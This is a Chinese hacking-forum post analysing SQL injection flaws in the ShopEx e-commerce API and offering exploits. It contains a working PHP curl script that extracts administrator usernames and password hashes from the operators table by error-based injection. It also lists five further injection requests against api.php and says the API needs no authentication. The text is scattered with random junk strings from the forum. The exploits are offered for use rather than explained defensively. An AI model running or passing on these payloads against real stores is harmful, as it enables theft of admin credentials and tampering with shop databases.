找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2201|回复: 0
打印 上一主题 下一主题

shopEx最新版的API注入漏洞分析附利用exp

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-27 18:34:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php( M2 y* m5 ^  [2 @
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php2 @) t! M+ l4 Q
2 m2 [1 G9 p' s
第44行 $data['columns'] 未做过滤导致注入
! i) R* H& m% a5 C
( m9 n; t2 U6 G<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.$ v9 B1 s9 l+ G
0 u: e, k! w, z! i
注射1:
5 A, E: j! ^& k0 \5 o7 {4 O9 @2 Y! ?7 x; I- F/ k4 L6 [
http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#( W8 K. F. a9 `; D% U' X% x: |& ?, M

) t, \4 J/ ~8 ]1 E/ _) s% a; r: k# x& _! G注射2:
2 D% }' ?+ s6 b6 k% Hhttp://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
# r/ h, h4 b+ A4 e# t7 `0 z) W  U- E+ s  d. F7 y3 u+ m
注射3:
0 ]; C8 u; H" E8 }2 p( e  http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx  ~. K8 u& P* S- h% D+ @
注射4:0 k1 w, N! E2 q
. c' y" y: h0 w" {; Z: u
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1
1 F. U2 o9 Q; b) a5 H1 o6 Z# C2 i1 [& f2 N
2 t% Q9 u, `) [  A3 V% D3 W
注射5:
/ b- Y6 ?6 Q+ L1 W: k, t5 I  http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx
% I/ Z1 d4 f' k8 M" Z' k3 P  X! l' u, S

5 X8 P/ C9 |$ c3 G* G2 D
2 d9 h5 E% a+ x8 R
/ @! |$ t1 L- ^1 A1 G, K
, {1 y! n* O' R5 k% [. H
# _$ j; j4 }9 U; d, U0 D# G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表